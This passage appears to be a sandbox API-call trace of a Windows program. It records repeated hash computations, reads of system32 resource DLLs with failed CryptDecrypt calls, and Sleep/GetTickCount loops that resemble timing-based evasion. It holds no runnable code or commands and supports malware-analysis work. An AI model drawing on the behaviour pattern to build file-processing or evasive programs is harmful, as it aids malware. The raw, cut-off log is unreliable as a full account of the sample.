dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0151.315] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62000 [0151.315] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.315] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0151.315] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.316] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.316] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0151.316] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62210 [0151.316] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.316] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.316] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.317] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.317] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0151.317] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62090 [0151.317] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0151.317] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.317] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.318] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.318] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0151.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61700 [0151.318] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.318] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.318] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.319] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.319] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0151.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62240 [0151.319] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.319] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.319] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0151.319] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.319] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0151.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61a00 [0151.319] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.319] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0151.319] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0151.320] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.320] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0151.320] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61760 [0151.320] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.320] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0151.320] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0151.321] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.321] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0151.321] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61a30 [0151.321] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.321] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0151.321] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821ed0) returned 1 [0151.321] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.321] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0151.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62120 [0151.322] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.322] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0151.322] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.322] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.322] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0151.322] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.322] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.322] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0151.324] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.324] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0151.324] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.324] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0151.324] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0151.324] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.324] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0151.324] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.324] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0151.324] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0151.325] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.325] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0151.325] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.325] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0151.325] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0151.326] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.326] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0151.326] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.326] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0151.326] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0151.326] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.326] CryptHashData (hHash=0x332b7900, pbData=0x32e5fa80, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0151.326] CryptDestroyHash (hHash=0x332b7900) returned 1 [0151.326] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0151.326] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0151.327] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.327] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0151.327] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.327] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0151.327] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0151.328] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.328] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0151.328] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0151.328] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0151.328] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821ed0) returned 1 [0151.328] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.328] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0151.328] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.328] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0151.328] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.329] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.329] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0151.329] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.329] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.329] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0151.330] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.330] CryptHashData (hHash=0x332b7890, pbData=0x32e5fa80, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0151.330] CryptDestroyHash (hHash=0x332b7890) returned 1 [0151.330] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0151.339] CryptSetKeyParam (hKey=0x332b75f0, dwParam=0x4, pbData=0xce574*=0x1, dwFlags=0x0) returned 1 [0151.339] CryptSetKeyParam (hKey=0x332b75f0, dwParam=0x1, pbData=0x32e62720, dwFlags=0x0) returned 1 [0151.366] CryptDecrypt (in: hKey=0x332b75f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x33dce040, pdwDataLen=0xce55c | out: pbData=0x33dce040, pdwDataLen=0xce55c) returned 0 [0151.367] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0151.367] CryptDestroyKey (hKey=0x332b75f0) returned 0 [0151.367] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x33dce040 | out: hHeap=0x2150000) returned 1 [0151.388] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e62720 | out: hHeap=0x2150000) returned 1 [0151.388] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e61280 | out: hHeap=0x2150000) returned 1 [0151.388] CloseHandle (hObject=0x590) returned 1 [0151.388] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x33ab4040 | out: hHeap=0x2150000) returned 1 [0151.403] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c6f0 | out: hHeap=0x2150000) returned 1 [0151.403] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c910 | out: hHeap=0x2150000) returned 1 [0151.403] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c4d0 | out: hHeap=0x2150000) returned 1 [0151.403] PathFindFileNameW (pszPath="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll") returned="AuthFWWizFwk.Resources.dll" [0151.403] GetFullPathNameW (in: lpFileName="EN\\AuthFWWizFwk.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e5c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll", lpFilePart=0x0) returned 0x31 [0151.403] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwwizfwk.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0151.403] GetFileTime (in: hFile=0x590, lpCreationTime=0xceb38, lpLastAccessTime=0xceb30, lpLastWriteTime=0xceb28 | out: lpCreationTime=0xceb38*(dwLowDateTime=0x9f38a9f5, dwHighDateTime=0x1d112f1), lpLastAccessTime=0xceb30*(dwLowDateTime=0x9f38a9f5, dwHighDateTime=0x1d112f1), lpLastWriteTime=0xceb28*(dwLowDateTime=0x9f38a9f5, dwHighDateTime=0x1d112f1)) returned 1 [0151.403] CloseHandle (hObject=0x590) returned 1 [0151.403] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xceb58 | out: lpSystemTimeAsFileTime=0xceb58*(dwLowDateTime=0xe6c1e26b, dwHighDateTime=0x1d7b3c9)) [0151.403] GetFullPathNameW (in: lpFileName="EN\\AuthFWWizFwk.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e5c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll", lpFilePart=0x0) returned 0x31 [0151.403] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwwizfwk.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x590 [0151.404] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdc00 [0151.404] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.404] ReadFile (in: hFile=0x590, lpBuffer=0x32e64aa0, nNumberOfBytesToRead=0xdc00, lpNumberOfBytesRead=0xce6a4, lpOverlapped=0x0 | out: lpBuffer=0x32e64aa0*, lpNumberOfBytesRead=0xce6a4*=0xdc00, lpOverlapped=0x0) returned 1 [0151.423] CryptSetKeyParam (hKey=0x332b77b0, dwParam=0x4, pbData=0xce574*=0x1, dwFlags=0x0) returned 1 [0151.423] CryptSetKeyParam (hKey=0x332b77b0, dwParam=0x1, pbData=0x32e74400, dwFlags=0x0) returned 1 [0151.423] CryptDecrypt (in: hKey=0x332b77b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e766c0, pdwDataLen=0xce55c | out: pbData=0x32e766c0, pdwDataLen=0xce55c) returned 0 [0151.423] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0151.423] CryptDestroyKey (hKey=0x332b77b0) returned 0 [0151.423] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e766c0 | out: hHeap=0x2150000) returned 1 [0151.426] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e74400 | out: hHeap=0x2150000) returned 1 [0151.426] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72c00 | out: hHeap=0x2150000) returned 1 [0151.426] CloseHandle (hObject=0x590) returned 1 [0151.426] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64aa0 | out: hHeap=0x2150000) returned 1 [0151.427] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c6f0 | out: hHeap=0x2150000) returned 1 [0151.427] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c910 | out: hHeap=0x2150000) returned 1 [0151.427] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c4d0 | out: hHeap=0x2150000) returned 1 [0151.427] PathFindFileNameW (pszPath="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll") returned="AutoWorkplace.Resources.dll" [0151.427] GetFullPathNameW (in: lpFileName="EN\\AutoWorkplace.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e5c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll", lpFilePart=0x0) returned 0x32 [0151.427] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll" (normalized: "c:\\windows\\system32\\en\\autoworkplace.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0151.427] GetFileTime (in: hFile=0x590, lpCreationTime=0xceb38, lpLastAccessTime=0xceb30, lpLastWriteTime=0xceb28 | out: lpCreationTime=0xceb38*(dwLowDateTime=0x9a1229a8, dwHighDateTime=0x1d112f1), lpLastAccessTime=0xceb30*(dwLowDateTime=0x9a1229a8, dwHighDateTime=0x1d112f1), lpLastWriteTime=0xceb28*(dwLowDateTime=0x9a1229a8, dwHighDateTime=0x1d112f1)) returned 1 [0151.427] CloseHandle (hObject=0x590) returned 1 [0151.427] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xceb58 | out: lpSystemTimeAsFileTime=0xceb58*(dwLowDateTime=0xe6c58b8b, dwHighDateTime=0x1d7b3c9)) [0151.427] GetFullPathNameW (in: lpFileName="EN\\AutoWorkplace.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e5c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll", lpFilePart=0x0) returned 0x32 [0151.427] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll" (normalized: "c:\\windows\\system32\\en\\autoworkplace.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x590 [0151.428] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1400 [0151.428] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.428] ReadFile (in: hFile=0x590, lpBuffer=0x32e64aa0, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0xce6a4, lpOverlapped=0x0 | out: lpBuffer=0x32e64aa0*, lpNumberOfBytesRead=0xce6a4*=0x1400, lpOverlapped=0x0) returned 1 [0151.440] CryptSetKeyParam (hKey=0x332b7820, dwParam=0x4, pbData=0xce574*=0x1, dwFlags=0x0) returned 1 [0151.440] CryptSetKeyParam (hKey=0x332b7820, dwParam=0x1, pbData=0x32e67b40, dwFlags=0x0) returned 1 [0151.440] CryptDecrypt (in: hKey=0x332b7820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e69ec0, pdwDataLen=0xce55c | out: pbData=0x32e69ec0, pdwDataLen=0xce55c) returned 0 [0151.440] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.440] CryptDestroyKey (hKey=0x332b7820) returned 0 [0151.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e69ec0 | out: hHeap=0x2150000) returned 1 [0151.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e67b40 | out: hHeap=0x2150000) returned 1 [0151.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e75b10 | out: hHeap=0x2150000) returned 1 [0151.440] CloseHandle (hObject=0x590) returned 1 [0151.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64aa0 | out: hHeap=0x2150000) returned 1 [0151.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c6f0 | out: hHeap=0x2150000) returned 1 [0151.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c910 | out: hHeap=0x2150000) returned 1 [0151.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c4d0 | out: hHeap=0x2150000) returned 1 [0151.440] PathFindFileNameW (pszPath="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll") returned="fhuxpresentation.Resources.dll" [0151.440] GetFullPathNameW (in: lpFileName="EN\\fhuxpresentation.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e5c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll", lpFilePart=0x0) returned 0x35 [0151.440] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll" (normalized: "c:\\windows\\system32\\en\\fhuxpresentation.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0151.440] GetFileTime (in: hFile=0x590, lpCreationTime=0xceb38, lpLastAccessTime=0xceb30, lpLastWriteTime=0xceb28 | out: lpCreationTime=0xceb38*(dwLowDateTime=0x9c3db3ca, dwHighDateTime=0x1d112f1), lpLastAccessTime=0xceb30*(dwLowDateTime=0x9c3db3ca, dwHighDateTime=0x1d112f1), lpLastWriteTime=0xceb28*(dwLowDateTime=0x9c3db3ca, dwHighDateTime=0x1d112f1)) returned 1 [0151.440] CloseHandle (hObject=0x590) returned 1 [0151.441] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xceb58 | out: lpSystemTimeAsFileTime=0xceb58*(dwLowDateTime=0xe6c79b1e, dwHighDateTime=0x1d7b3c9)) [0151.441] GetFullPathNameW (in: lpFileName="EN\\fhuxpresentation.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e5c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll", lpFilePart=0x0) returned 0x35 [0151.441] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll" (normalized: "c:\\windows\\system32\\en\\fhuxpresentation.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x590 [0151.441] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3ec00 [0151.441] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.443] ReadFile (in: hFile=0x590, lpBuffer=0x32ac5770, nNumberOfBytesToRead=0x3ec00, lpNumberOfBytesRead=0xce6a4, lpOverlapped=0x0 | out: lpBuffer=0x32ac5770*, lpNumberOfBytesRead=0xce6a4*=0x3ec00, lpOverlapped=0x0) returned 1 [0151.457] CryptSetKeyParam (hKey=0x332b7890, dwParam=0x4, pbData=0xce574*=0x1, dwFlags=0x0) returned 1 [0151.457] CryptSetKeyParam (hKey=0x332b7890, dwParam=0x1, pbData=0x32e66ca0, dwFlags=0x0) returned 1 [0151.458] CryptDecrypt (in: hKey=0x332b7890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32b04380, pdwDataLen=0xce55c | out: pbData=0x32b04380, pdwDataLen=0xce55c) returned 0 [0151.459] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0151.459] CryptDestroyKey (hKey=0x332b7890) returned 0 [0151.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32b04380 | out: hHeap=0x2150000) returned 1 [0151.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e66ca0 | out: hHeap=0x2150000) returned 1 [0151.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e69100 | out: hHeap=0x2150000) returned 1 [0151.461] CloseHandle (hObject=0x590) returned 1 [0151.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ac5770 | out: hHeap=0x2150000) returned 1 [0151.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c6f0 | out: hHeap=0x2150000) returned 1 [0151.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c910 | out: hHeap=0x2150000) returned 1 [0151.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c4d0 | out: hHeap=0x2150000) returned 1 [0151.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c2b0 | out: hHeap=0x2150000) returned 1 [0151.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4fe60 | out: hHeap=0x2150000) returned 1 [0151.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e42330 | out: hHeap=0x2150000) returned 1 [0151.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e410c0 | out: hHeap=0x2150000) returned 1 [0151.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e592a0 | out: hHeap=0x2150000) returned 1 [0151.462] GetTickCount () returned 0xe8f8bf [0151.462] GetTickCount () returned 0xe8f8bf [0151.462] Sleep (dwMilliseconds=0x5b01) [0161.477] GetTickCount () returned 0xe953cf [0161.477] Sleep (dwMilliseconds=0x54e1) [0161.493] GetTickCount () returned 0xe9a8bf [0161.493] Sleep (dwMilliseconds=0x5a81) [0161.508] GetTickCount () returned 0xea034f [0161.508] Sleep (dwMilliseconds=0x55a1) [0161.524] GetTickCount () returned 0xea58fe [0161.524] Sleep (dwMilliseconds=0x4805) [0161.534] GetTickCount () returned 0xeaa102 [0161.534] Sleep (dwMilliseconds=0x4d83) [0161.549] GetTickCount () returned 0xeaee94 [0161.549] Sleep (dwMilliseconds=0x469b) [0161.565] GetTickCount () returned 0xeb353e [0161.565] Sleep (dwMilliseconds=0x5a75) [0161.581] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcecc8 | out: 